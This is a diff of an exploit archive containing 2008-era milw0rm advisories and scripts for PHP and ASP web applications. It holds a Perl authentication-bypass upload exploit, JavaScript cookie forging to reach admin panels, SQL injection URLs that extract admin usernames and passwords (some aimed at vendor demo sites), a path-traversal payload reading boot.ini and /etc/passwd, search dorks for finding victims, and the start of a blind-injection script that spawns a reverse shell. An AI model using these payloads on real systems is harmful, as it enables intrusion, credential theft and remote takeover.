-my $re = $ua->request(POST $host . '/cms/admin/upload.php',
-                        Content_Type =>   'form-data',
-                        Content      => [ 'submit0'  => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false
-                                          'submit'   => 1, 
-                                          'password' => 1, # as long as this is true we should be able to upload
-                                          'filename' => $fname,
-                                          'upload'   => [ $file ] ] );
-
-die "Exploit Failed, HTTP Request Failed!" unless $re->is_success;
-
-print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n";
-exit;
-
-# milw0rm.com [2008-06-21]
+#!/usr/bin/perl
+
+use strict;
+use warnings;
+use LWP::UserAgent;
+use HTTP::Request::Common;
+
+print <);
+    
+print "\nEnter Local File Path To Upload(ie: C:\\file.txt): ";
+    chomp(my $file=);
+
+my $ext   = substr $file, rindex $file, '.';
+my $fname = int rand 9999;
+my $ua    = LWP::UserAgent->new( agent => 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)', cookie_jar => {} );
+
+my $re = $ua->request(POST $host . '/cms/admin/upload.php',
+                        Content_Type =>   'form-data',
+                        Content      => [ 'submit0'  => 'authed', # if script reads this as TRUE then the script thinks we have already authenticated the username/password, only 0 or undef is false
+                                          'submit'   => 1, 
+                                          'password' => 1, # as long as this is true we should be able to upload
+                                          'filename' => $fname,
+                                          'upload'   => [ $file ] ] );
+
+die "Exploit Failed, HTTP Request Failed!" unless $re->is_success;
+
+print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n";
+exit;
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5888.txt b/platforms/php/webapps/5888.txt
index d94aceebb..f9791810e 100755
--- a/platforms/php/webapps/5888.txt
+++ b/platforms/php/webapps/5888.txt
@@ -1,91 +1,91 @@
--[*]+================================================================================+[*]-
--[*]+         CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability       +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 19 JUNE 2008
-[*] Script Download: http://castillocentral.com/
-[*] DORK: "Powered by CCLeague Pro"  (alot of sites removed dork, so find another)
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION: 
-
-	CCLeage Pro 1.2 and all prior versions suffer from multiple insecure cookie validation vulnerabilitys.
-	
-	Lets take a look at a line from the "admin.php" file from "CCLeage Pro 1.2"
-
-	CODE LINE 52 (admin.php): 
-		if($_COOKIE['PHPSESSID'] == session_id(  ) && $_COOKIE['type'] == "admin") { .. }
-
-	As we can see above, the script checks to see if a cookie is set and matches a value, as we know this is very easy to bypass by creating a cookie,
-	but now what above the "$_COOKIE['PHPSESSID'] == session_id(  )" how do we bypass this you ask?
-
-	well in some versions this part doesnt even exist, but most hosts are running the upto date versions so we still need a way to bypass.
-
-	anyway, the php function session_id checks/returns the PHPSESSID if any, and here it is returning the sessionid, since we havent created any session
-	the function will return "" (not null), so all we need to do is make our PHPSESSID match this, and since its grabbing it from a cookie thats simple.
-	
-	at the minute our PHPSESSID will be some random hash, so we can simply change this by overwriting the cookie.
-
-	See the javascript code below in a second to successfully exploit this.
-
-	Once you have run the javascript code in your browser, you will be able to visit the "admin.php" area without having to login, but now
-	you probarly see alot of errors, this is because the script attempts to load the admin preferences based on a cookie, since we dont have this cookie set
-	its pulling non-existent data from the mysql database.
-
-	so once again we need to set another cookie which needs to contain a existing admins email address, this should be too hard to obtain from sniffing around
-	the site.
-
-	here is the line of code from the admin.php which attempts to select the admin config from the db.
-
-	CODE LINE 67 (admin.php): $admininfo = mysql_query("SELECT * FROM ".$_CONF['tprefix']."administrators WHERE contact_email = '$_COOKIE[u]' LIMIT 0,1");	
-
-	there is also a sql injection in the above line, if magic quotes are off, so you rippers dont bother reposting that has a seperate vulnerability.
-
-	Thats about it, Check below for the javascript code which will craft the cookies for you.
-
-		Goodluck!
-
-
-
-[*] Vulnerability/Javascript:
-	
-	javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/"; // this will create one cookie and null the other
-	javascript:document.cookie = "u=admin@domain.com; path=/"; // replace the email with a existent admin email from the site, if this isnt correct your not gona get very far.
-
-
-
-[*] NOTE/TIP: 
-
-
-	Use the dork and find a site, navigate to the site, once at the site run the above javascript code (paste into your address bar), dont forget
-	to replace the email in the second javascript line.
-
-	after you have done the above steps visit the admin area at "admin.php"
-
-
-
-[*] GREETZ: 
-
-	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] peace, 
-
-	t0pP8uZz
-
-
-
--[*]+================================================================================+[*]-
--[*]+         CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability       +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-06-21]
+-[*]+================================================================================+[*]-
+-[*]+         CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability       +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 19 JUNE 2008
+[*] Script Download: http://castillocentral.com/
+[*] DORK: "Powered by CCLeague Pro"  (alot of sites removed dork, so find another)
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION: 
+
+	CCLeage Pro 1.2 and all prior versions suffer from multiple insecure cookie validation vulnerabilitys.
+	
+	Lets take a look at a line from the "admin.php" file from "CCLeage Pro 1.2"
+
+	CODE LINE 52 (admin.php): 
+		if($_COOKIE['PHPSESSID'] == session_id(  ) && $_COOKIE['type'] == "admin") { .. }
+
+	As we can see above, the script checks to see if a cookie is set and matches a value, as we know this is very easy to bypass by creating a cookie,
+	but now what above the "$_COOKIE['PHPSESSID'] == session_id(  )" how do we bypass this you ask?
+
+	well in some versions this part doesnt even exist, but most hosts are running the upto date versions so we still need a way to bypass.
+
+	anyway, the php function session_id checks/returns the PHPSESSID if any, and here it is returning the sessionid, since we havent created any session
+	the function will return "" (not null), so all we need to do is make our PHPSESSID match this, and since its grabbing it from a cookie thats simple.
+	
+	at the minute our PHPSESSID will be some random hash, so we can simply change this by overwriting the cookie.
+
+	See the javascript code below in a second to successfully exploit this.
+
+	Once you have run the javascript code in your browser, you will be able to visit the "admin.php" area without having to login, but now
+	you probarly see alot of errors, this is because the script attempts to load the admin preferences based on a cookie, since we dont have this cookie set
+	its pulling non-existent data from the mysql database.
+
+	so once again we need to set another cookie which needs to contain a existing admins email address, this should be too hard to obtain from sniffing around
+	the site.
+
+	here is the line of code from the admin.php which attempts to select the admin config from the db.
+
+	CODE LINE 67 (admin.php): $admininfo = mysql_query("SELECT * FROM ".$_CONF['tprefix']."administrators WHERE contact_email = '$_COOKIE[u]' LIMIT 0,1");	
+
+	there is also a sql injection in the above line, if magic quotes are off, so you rippers dont bother reposting that has a seperate vulnerability.
+
+	Thats about it, Check below for the javascript code which will craft the cookies for you.
+
+		Goodluck!
+
+
+
+[*] Vulnerability/Javascript:
+	
+	javascript:document.cookie = "type=admin; path=/"; document.cookie = "PHPSESSID=; path=/"; // this will create one cookie and null the other
+	javascript:document.cookie = "u=admin@domain.com; path=/"; // replace the email with a existent admin email from the site, if this isnt correct your not gona get very far.
+
+
+
+[*] NOTE/TIP: 
+
+
+	Use the dork and find a site, navigate to the site, once at the site run the above javascript code (paste into your address bar), dont forget
+	to replace the email in the second javascript line.
+
+	after you have done the above steps visit the admin area at "admin.php"
+
+
+
+[*] GREETZ: 
+
+	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] peace, 
+
+	t0pP8uZz
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+         CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability       +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5889.txt b/platforms/php/webapps/5889.txt
index ab406930e..8af6b75b5 100755
--- a/platforms/php/webapps/5889.txt
+++ b/platforms/php/webapps/5889.txt
@@ -1,58 +1,58 @@
--[*]+================================================================================+[*]-
--[*]+		    OFFL <= 0.2.6 Remote SQL Injection Vulnerability	             +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 19 JUNE 2008
-[*] Script Download: http://downloads.sourceforge.net/offl
-[*] DORK: N/A
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION: 
-
-	OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys.
-	
-	SQL Injections below, there are various other spots which are injectable too...
- 
-	including " leagues.php?league_id=1' ", " players.php?player_id=190' " 	
-
-
-
-[*] SQL Injection:
-
-For Admin: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/WHERE/**/admin=1/**/LIMIT/**/0,1/*
-For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/LIMIT/**/0,1/*
-
-
-
-[*] NOTE/TIP: 
-
-	admin area is at "admin.php" login using the normal login page first.
-	passwords are encrypted in MD5
-
-	no effcient dork, sql columns may vary on some sites.
-
-[*] GREETZ: 
-
-	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Peace...
-
-	...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+		    OFFL <= 0.2.6 Remote SQL Injection Vulnerability	             +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-06-21]
+-[*]+================================================================================+[*]-
+-[*]+		    OFFL <= 0.2.6 Remote SQL Injection Vulnerability	             +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 19 JUNE 2008
+[*] Script Download: http://downloads.sourceforge.net/offl
+[*] DORK: N/A
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION: 
+
+	OFFL 0.2.6 and prior versions, suffer from multiple insecure mysql querys.
+	
+	SQL Injections below, there are various other spots which are injectable too...
+ 
+	including " leagues.php?league_id=1' ", " players.php?player_id=190' " 	
+
+
+
+[*] SQL Injection:
+
+For Admin: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/WHERE/**/admin=1/**/LIMIT/**/0,1/*
+For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT(username,0x3a,password)/**/FROM/**/users/**/LIMIT/**/0,1/*
+
+
+
+[*] NOTE/TIP: 
+
+	admin area is at "admin.php" login using the normal login page first.
+	passwords are encrypted in MD5
+
+	no effcient dork, sql columns may vary on some sites.
+
+[*] GREETZ: 
+
+	milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Peace...
+
+	...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+		    OFFL <= 0.2.6 Remote SQL Injection Vulnerability	             +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5890.txt b/platforms/php/webapps/5890.txt
index bfdfb2a3c..7ff4fcceb 100755
--- a/platforms/php/webapps/5890.txt
+++ b/platforms/php/webapps/5890.txt
@@ -1,59 +1,59 @@
-########################################################
-#
-#    HYIP ACME Version  SQL Injection Vulnerability
-#========================================================
-#    Author: Hussin X                                   =
-#                                                       =
-#    Home :  www.tryag.cc/cc                            =
-#                                                       =
-#    email:  darkangel_g85[at]Yahoo[DoT]com             =
-#            hussin.x[at]hotmail[DoT]com                =
-#                                                       =
-#========================================================
-#    HomE script : http://www.ajsquare.com/
-#     
-#    Demo : http://www.ajhyip.com/demo/acme/index.php   
-#    
-#
-#    DorK :  Copyright Acme 2008
-#
-#      
-##########################################################
-
-Exploit:   
-
-
-http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws
-
-(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin
-
---
-
-
-
-L!VE DEMO:
-
-http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws
-
-(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin
-
---
-
-
-LogiN:
-
-admin/index.php
-
-
-################################################################################
-####################################( Greetz )##################################
-#                                                                              #
-#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
-
-#                Silic0n  / Rafi / FAHD / Iraqihack                            #       
-
-#                                                                              #
-#################################(and All IRAQIs)###############################
-################################################################################
-
-# milw0rm.com [2008-06-21]
+########################################################
+#
+#    HYIP ACME Version  SQL Injection Vulnerability
+#========================================================
+#    Author: Hussin X                                   =
+#                                                       =
+#    Home :  www.tryag.cc/cc                            =
+#                                                       =
+#    email:  darkangel_g85[at]Yahoo[DoT]com             =
+#            hussin.x[at]hotmail[DoT]com                =
+#                                                       =
+#========================================================
+#    HomE script : http://www.ajsquare.com/
+#     
+#    Demo : http://www.ajhyip.com/demo/acme/index.php   
+#    
+#
+#    DorK :  Copyright Acme 2008
+#
+#      
+##########################################################
+
+Exploit:   
+
+
+http://www.site.com/[PaTs]/news.php?id=-1+union+select+null,null,concat_ws
+
+(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin
+
+--
+
+
+
+L!VE DEMO:
+
+http://www.ajhyip.com/demo/acme/news.php?id=-1+union+select+null,null,concat_ws
+
+(0x3a,username,admin_password),0x4861636B65645F42795F48757373696E5F58,null+from+admin
+
+--
+
+
+LogiN:
+
+admin/index.php
+
+
+################################################################################
+####################################( Greetz )##################################
+#                                                                              #
+#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
+
+#                Silic0n  / Rafi / FAHD / Iraqihack                            #       
+
+#                                                                              #
+#################################(and All IRAQIs)###############################
+################################################################################
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5892.txt b/platforms/php/webapps/5892.txt
index e049d13eb..be5018b45 100755
--- a/platforms/php/webapps/5892.txt
+++ b/platforms/php/webapps/5892.txt
@@ -1,49 +1,49 @@
-#########################################################
-#
-#    phpauction-gpl Version3.2 Version  SQL Injection Vulnerability
-#========================================================
-#    Author: Hussin X                                   =
-#                                                       =
-#    Home :  www.tryag.cc/cc                            =
-#                                                       =
-#    email:  darkangel_g85[at]Yahoo[DoT]com             =
-#            hussin.x[at]hotmail[DoT]com                =
-#                                                       =
-#========================================================
-#    HomE script : http://www.phpauction.net
-#     
-#    Demo : http://www.phpauction.net/phpauction-gpl-3.2/   
-#    
-#
-#    DorK :  Copyright 2007, PHPAUCTION.NET
-#
-#      
-##########################################################
-
-Exploit:   
-
-
-http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
-
-
-
-L!VE DEMO:
-
-http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
-
-
-LogiN:
-
-admin/index.php
-
-
-################################################################################
-####################################( Greetz )##################################
-#                                                                              #
-#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
-#                Silic0n  / Rafi / FAHD / Iraqihack                            #       
-#                                                                              #
-#################################(and All IRAQIs)###############################
-################################################################################
-
-# milw0rm.com [2008-06-21]
+#########################################################
+#
+#    phpauction-gpl Version3.2 Version  SQL Injection Vulnerability
+#========================================================
+#    Author: Hussin X                                   =
+#                                                       =
+#    Home :  www.tryag.cc/cc                            =
+#                                                       =
+#    email:  darkangel_g85[at]Yahoo[DoT]com             =
+#            hussin.x[at]hotmail[DoT]com                =
+#                                                       =
+#========================================================
+#    HomE script : http://www.phpauction.net
+#     
+#    Demo : http://www.phpauction.net/phpauction-gpl-3.2/   
+#    
+#
+#    DorK :  Copyright 2007, PHPAUCTION.NET
+#
+#      
+##########################################################
+
+Exploit:   
+
+
+http://www.site.net/[Pats]/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
+
+
+
+L!VE DEMO:
+
+http://www.phpauction.net/phpauction-gpl-3.2/item.php?id=-1+%75%6E%69%6F%6E+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+%66%72%6F%6D+PHPAUCTIONXL_adminusers--
+
+
+LogiN:
+
+admin/index.php
+
+
+################################################################################
+####################################( Greetz )##################################
+#                                                                              #
+#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
+#                Silic0n  / Rafi / FAHD / Iraqihack                            #       
+#                                                                              #
+#################################(and All IRAQIs)###############################
+################################################################################
+
+# milw0rm.com [2008-06-21]
diff --git a/platforms/php/webapps/5893.txt b/platforms/php/webapps/5893.txt
index a02aa4de7..2a6f57963 100755
--- a/platforms/php/webapps/5893.txt
+++ b/platforms/php/webapps/5893.txt
@@ -1,21 +1,21 @@
-/---------------------------------------------------------------\
-\                                				/
-/         Joomla Component expshop Remote SQL injection         \
-\                                				/
-\---------------------------------------------------------------/
-
-
-[*] Author    :  His0k4 [ALGERIAN HaCkEr]
-
-[*] Dork      :  inurl:com_expshop
-
-[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}
-
-[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
-
-                
-----------------------------------------------------------------------------
-[*] Greetings :  All friends & muslims HaCkeRs...
-[*] Greetings2:  http://palcastle.org/cc
-
-# milw0rm.com [2008-06-22]
+/---------------------------------------------------------------\
+\                                				/
+/         Joomla Component expshop Remote SQL injection         \
+\                                				/
+\---------------------------------------------------------------/
+
+
+[*] Author    :  His0k4 [ALGERIAN HaCkEr]
+
+[*] Dork      :  inurl:com_expshop
+
+[*] POC        : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid={SQL}
+
+[*] Example    : http://localhost/[Joomla_Path]/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users--
+
+                
+----------------------------------------------------------------------------
+[*] Greetings :  All friends & muslims HaCkeRs...
+[*] Greetings2:  http://palcastle.org/cc
+
+# milw0rm.com [2008-06-22]
diff --git a/platforms/php/webapps/5895.txt b/platforms/php/webapps/5895.txt
index 23ec3bbb3..d37523e32 100755
--- a/platforms/php/webapps/5895.txt
+++ b/platforms/php/webapps/5895.txt
@@ -1,53 +1,53 @@
-Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability
-
-================================================================
-
-[+] Author : KnocKout
-[+] Special Thankz : Dr.Kacak
-[+] System 0VerfL0verZ
-
-=================================================================
-
-Script : sHibby sHop
-Verz: 2.2
-Download : http://aspindir.com/goster/4476
-
- 
-
-SQL attack ;
-
-http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar
-
-Tables;
-
-yasakli
-ustmenu
-urun_yorum
-urun
-ureticiler
-tema
-site_gel
-siparis
-sayfa
-say_site
-say_ip
-say_hit
-online
-kategori
-banner
-ayarlar
-
- ------------
- 
- Update file ( Direct Access )
-
- http://localsite.com/path/upgrade.asp
- 
-
-And default Database file
-
-http://target.com/path/Db/urun.mdb
-
-###############################################################
-
-# milw0rm.com [2008-06-22]
+Title: sHibby sHop v2.2 <= Remote (SQL/Update) Multiple Vulnerability
+
+================================================================
+
+[+] Author : KnocKout
+[+] Special Thankz : Dr.Kacak
+[+] System 0VerfL0verZ
+
+=================================================================
+
+Script : sHibby sHop
+Verz: 2.2
+Download : http://aspindir.com/goster/4476
+
+ 
+
+SQL attack ;
+
+http://target.com/path/default.asp?git=4&sayfa=-3+union+all+select+0,copy,keyword+from+ayarlar
+
+Tables;
+
+yasakli
+ustmenu
+urun_yorum
+urun
+ureticiler
+tema
+site_gel
+siparis
+sayfa
+say_site
+say_ip
+say_hit
+online
+kategori
+banner
+ayarlar
+
+ ------------
+ 
+ Update file ( Direct Access )
+
+ http://localsite.com/path/upgrade.asp
+ 
+
+And default Database file
+
+http://target.com/path/Db/urun.mdb
+
+###############################################################
+
+# milw0rm.com [2008-06-22]
diff --git a/platforms/php/webapps/5896.txt b/platforms/php/webapps/5896.txt
index 63ee85cf3..cdf718706 100755
--- a/platforms/php/webapps/5896.txt
+++ b/platforms/php/webapps/5896.txt
@@ -1,83 +1,83 @@
-=====================================================
-  CMS Mini 0.2.2 Local File Inclusion Vulnerability
-=====================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 22 June 2008
-SITE   : www.citec.us
-
-
-#####################################################
- APPLICATION : CMS Mini
- VERSION     : 0.2.2
- VENDOR	     : http://www.cmsmini.it/
- DOWNLOAD    : http://downloads.sourceforge.net/cmsmini
-#####################################################
-
---- Local File Inclusion ---
-
-----------------------------
- Vulnerable File [view/index.php]
-----------------------------
-
-@Line 5
-
-   20:  if( !is_dir('../pages') ) header("location: ../admin/login.php");
-   21:
-   22:  $path = $_GET['path'];
-   23:  $p = $_GET['p'];
-   24:  $msg = $_GET['msg'];
-   25:  $pext = strrchr($p, '.');
-   26:  if( $path )
-   27:  $dirpath = '../pages/'.$path;
-   28:  else
-   29:  $dirpath = '../pages';
-
-
----------
- Exploit
----------
-[+] http://[Target]/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html
-[+] http://[Target]/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html
-
-    This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
-    You can change boot.ini to /etc/passwd%00 in linux OS.
-
--------------
- POC Exploit
--------------
-
-[+] GET http://192.168.24.25/cmsmini/view/?path=../../../../../../../../../../boot.ini%00&p=index.html HTTP/1.1
-[+] Host: 192.168.24.25
-[+] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
-[+] Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
-[+] Accept-Language: en-us,en;q=0.5
-[+] Accept-Encoding: gzip,deflate
-[+] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
-[+] Keep-Alive: 300
-[+] Proxy-Connection: keep-alive
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-22]
+=====================================================
+  CMS Mini 0.2.2 Local File Inclusion Vulnerability
+=====================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 22 June 2008
+SITE   : www.citec.us
+
+
+#####################################################
+ APPLICATION : CMS Mini
+ VERSION     : 0.2.2
+ VENDOR	     : http://www.cmsmini.it/
+ DOWNLOAD    : http://downloads.sourceforge.net/cmsmini
+#####################################################
+
+--- Local File Inclusion ---
+
+----------------------------
+ Vulnerable File [view/index.php]
+----------------------------
+
+@Line 5
+
+   20:  if( !is_dir('../pages') ) header("location: ../admin/login.php");
+   21:
+   22:  $path = $_GET['path'];
+   23:  $p = $_GET['p'];
+   24:  $msg = $_GET['msg'];
+   25:  $pext = strrchr($p, '.');
+   26:  if( $path )
+   27:  $dirpath = '../pages/'.$path;
+   28:  else
+   29:  $dirpath = '../pages';
+
+
+---------
+ Exploit
+---------
+[+] http://[Target]/[cmsmini_path]/view/?path=../../../../../../../../boot.ini%00&p=index.html
+[+] http://[Target]/[cmsmini_path]/view/?path=cwh&p=../../../../../../../../boot.ini%00.html
+
+    This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+    You can change boot.ini to /etc/passwd%00 in linux OS.
+
+-------------
+ POC Exploit
+-------------
+
+[+] GET http://192.168.24.25/cmsmini/view/?path=../../../../../../../../../../boot.ini%00&p=index.html HTTP/1.1
+[+] Host: 192.168.24.25
+[+] User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
+[+] Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+[+] Accept-Language: en-us,en;q=0.5
+[+] Accept-Encoding: gzip,deflate
+[+] Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+[+] Keep-Alive: 300
+[+] Proxy-Connection: keep-alive
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-22]
diff --git a/platforms/php/webapps/5898.pl b/platforms/php/webapps/5898.pl
index 99accfc34..25475e962 100755
--- a/platforms/php/webapps/5898.pl
+++ b/platforms/php/webapps/5898.pl
@@ -1,216 +1,216 @@
-#!/usr/bin/perl
-#
-# 05/18/2008 - IGSuite 3.2.4 Blind SQL Injection - k`sOSe
-# 
-# 05/21/2008 -  Vendor notified
-# 05/23/2008 -  A patch was pushed via the igsuited daemon(not enabled by default)
-# Fix: run igsuited --update-igsuite or upgrade to 3.2.5-beta.
-# 
-# Tested on IGSuite 3.2.4 on linux with MySQL, needs nc(in path).
-# Drops a reverse shell, use http://pentestmonkey.net/tools/php-reverse-shell/
-#
-#
-# cohelet ~ # ./igsploit.pl localhost /cgi-bin / ./php-reverse-shell.php 1234
-# IGSploit 0.1 - k`sOSe
-#
-# [*] Abusing blind SQL injection: ksose=qwerty
-# [*] Logging in with username `ksose', password `qwerty'...
-# [I] Found `formid' -> 12141384631aX7I
-# [I] Logged in!
-# [*] Uploading shell..
-# [I] Found `formid' -> 1214138463vOl5x
-# [*] Requesting //Home/ksose/php-reverse-shell.php now, shell will spawn here...
-# listening on [any] 1234 ...
-# connect to [127.0.0.1] from localhost [127.0.0.1] 44758
-# Linux cohelet 2.6.25-gentoo-r5 #1 SMP PREEMPT Sat Jun 21 11:32:15 CEST 2008 i686 Intel(R) Core(TM)2 CPU 6600 @ 2.40GHz GenuineIntel GNU/Linux
-#  14:41:05 up 1 day,  2:52,  1 user,  load average: 0.51, 0.34, 0.52
-#  USER     TTY        LOGIN@   IDLE   JCPU   PCPU WHAT
-#  root     tty1      Sat11   21:33m  0.84s  0.02s /bin/login --
-#  uid=81(apache) gid=81(apache) groups=81(apache)
-#  sh: no job control in this shell
-#  sh-3.2$
-
-use warnings;
-use strict;
-
-print "IGSploit 0.1 - k`sOSe\n\n";
-usage() unless(@ARGV>2);
-
-
-use POSIX;
-use LWP::UserAgent;
-use HTTP::Cookies;
-
-my $ighost	= $ARGV[0];
-my $igcgi	= $ARGV[1];
-my $igpath	= $ARGV[2];
-my $evilfile	= $ARGV[3];
-my $rport	= $ARGV[4];
-my $igurl	= 'http://' . $ighost . $igcgi;
-my @chars	= ( '', '=', 'a'..'z', 0..9, 'A'..'Z', '-', '_', '@', ';', ':', ',', '.', ')' ,'(', '&', '/', '%', '$' );
-
-my $count	= 1;
-my $string	= '';
-
-my $ua = LWP::UserAgent->new;  $ua->agent( "Mozilla/5.0" );
-$ua->cookie_jar( HTTP::Cookies->new( ) );
-$ua->timeout(5);
-
-
-
